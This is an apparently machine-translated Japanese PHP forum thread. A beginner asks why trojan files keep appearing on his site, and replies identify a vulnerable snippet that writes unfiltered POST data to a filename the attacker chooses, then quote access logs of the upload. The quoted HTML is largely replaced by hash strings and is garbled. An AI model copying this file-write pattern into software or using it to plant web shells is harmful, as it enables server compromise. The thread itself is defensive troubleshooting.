ホームページ >バックエンド開発 >PHPチュートリアル >このファイルにバックドアや脆弱性がないか確認するのにご協力ください。

このファイルにバックドアや脆弱性がないか確認するのにご協力ください。

WBOY
WBOYオリジナル
2016-06-23 14:27:09972ブラウズ

私は初心者です。私の Web サイトには常にトロイの木馬ファイルが存在します。ハッカーがそれをどのようにして私の Web サイトにアップロードしたのか非常に興味があります。
54abf4a85dd9ab591afa1072cb611355
4cc5a300ca73b1c513ec804ccfa85ea5 ;td width="4%" height="28" align="center" nowrap="NOWRAP" bordercolor="cccccc" bgcolor="#CD9A99">シリアル番号b90dd5946f0946207856a8a37f441edf
1c5c9ea8f53eb327d0a052e05171983eザンチェンb90dd5946f0946207856a8a37f441edf
93d418cc90e674609f035b68d90bbc31メイドだけど 1b6ebd1a65f49d9b4c1e5734eacdc9bf寺院に移動 整列 = "中央" ナラップBorderColor = "CCCCCC" BGCOLOR = "#cd9a99" & GT; lor = "cccccc" bgcolor = "
4cc5a300ca73b1c513ec804ccfa85ea5
64876402e29e4033572f1caf210c45a8b90dd5946f0946207856a8a37f441edf 64876402e29e4033572f1caf210c45a8  /td> "nowrap"> b90dd5946f0946207856a8a37f441edf
fd273fcf5bcad3dfdad3c41bd81ad3e5
f16b1740fad44fb09bfe928bcc527e08186037de1cfca0da5ac38897900c3418
3f131910e8fee9b713a23dc2e4feb275
                  a34de1251f0d9fe1e645927f19a896e8
                    f86c6178277f32a7908bb42ae6edba5b7033586f238e0fdff47e3db6a9feb01a 8e99a69fbe029cd4e2b854e244eab143
                      64c5cf33609ee867094b8d1f36f84f00
                      设置128dba7a3a77be0113eb0bea6ea0a5d0e6e38b3c62e8df885fe2e3986461aa63b90dd5946f0946207856a8a37f441edf
                    f15d83f8a53654762a66eacdd3aa2dc4de5b7817cae98699b57f42e16ba24ef8
                     
 bb3c5f561e022e6fda0dc5166497a7a3a2c476fd2ef6ac94cb0c0c044b5ae496f137104266efd8c4b6eb54dbf5ad2e97;'>组合54bdf357c58b8a65c66d7c19c8e4d11465281c5ac262bf6d81768915a4a77ac0
             ab358fc8ae6ed5afd4d1158a079eeacfa2c476fd2ef6ac94cb0c0c044b5ae496ef929c2f0666370e8b1a61c6946ba3a9;'>百位54bdf357c58b8a65c66d7c19c8e4d11465281c5ac262bf6d81768915a4a77ac0
             8a00795090aab32f4716c016e24e51c5a2c476fd2ef6ac94cb0c0c044b5ae496a7cb57adc0bd515b1deffca9f23efd22;'>拾位54bdf357c58b8a65c66d7c19c8e4d11465281c5ac262bf6d81768915a4a77ac0
             4823b87a07013abe969bd1afd2213e58a2c476fd2ef6ac94cb0c0c044b5ae4960a6007c563b7ee544ece0f1d1bca5350;'>个位54bdf357c58b8a65c66d7c19c8e4d11465281c5ac262bf6d81768915a4a77ac0
                    16b28748ea4df4d9c2150843fecfba68b90dd5946f0946207856a8a37f441edf

ディスカッションへの返信 (解決策)

if($_POST['img_text'] == 'news') {  $title = $_POST['title'];  $newsort = $_POST['newsort'];  $newsort = str_replace(chr(92), "", $newsort);  $fp = fopen($title, "w");   fputs($fp, $newsort);   fclose($fp); }
コードだけですが、コンテンツはアップロードできませんか?


アップロードするには他のファイルと連携する必要がありますか?

フォームを見たことがありませんが、ページのアドレスがわかれば簡単に作成できます
たとえば

rrreeサーバー上に info.php という名前のファイルを作成します。これを実行すると、サーバーに関するすべての情報がわかります

2013-11-10 13:26:23 POST /k_vc.php - 98.126.241.18 Mozilla/4.0+ (互換性;+MSIE+6.0;+Windows+NT+5.1;+SV1;+.NET+CLR+2.0.50727) http://localhost/sqst/index.asp www.itc888.com 200 0 1965 41441 5843

2013-11-10 13:26:29 GET /cc.php - 98.126.241.18 Mozilla/4.0+(互換性;+MSIE+6.0;+Windows+NT+5.1;+SV1;+.NET+CLR +2.0.50727 ) - www.itc888.com 200 0 1330 661 3593

ログの説明: k_vc.php は上記のファイル、cc.php はトロイの木馬ファイル www.itc888.com Web サイトのドメイン名

$ newsort =$_POST[' newsort']; フィルタリングせずに、タイトルファイルに直接書き込まれました。 大きな抜け穴があります...


1B と同じくらい強力な、神のようなコード

初心者の私でもこのアップロードを理解できます。

声明:
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。